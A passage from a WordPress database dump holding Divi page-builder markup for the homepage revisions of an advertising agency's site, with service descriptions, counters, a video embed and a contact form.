animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:28:46','2020-08-07 20:28:46','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(625,1,'2020-08-07 20:29:16','2020-08-07 20:29:16','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" 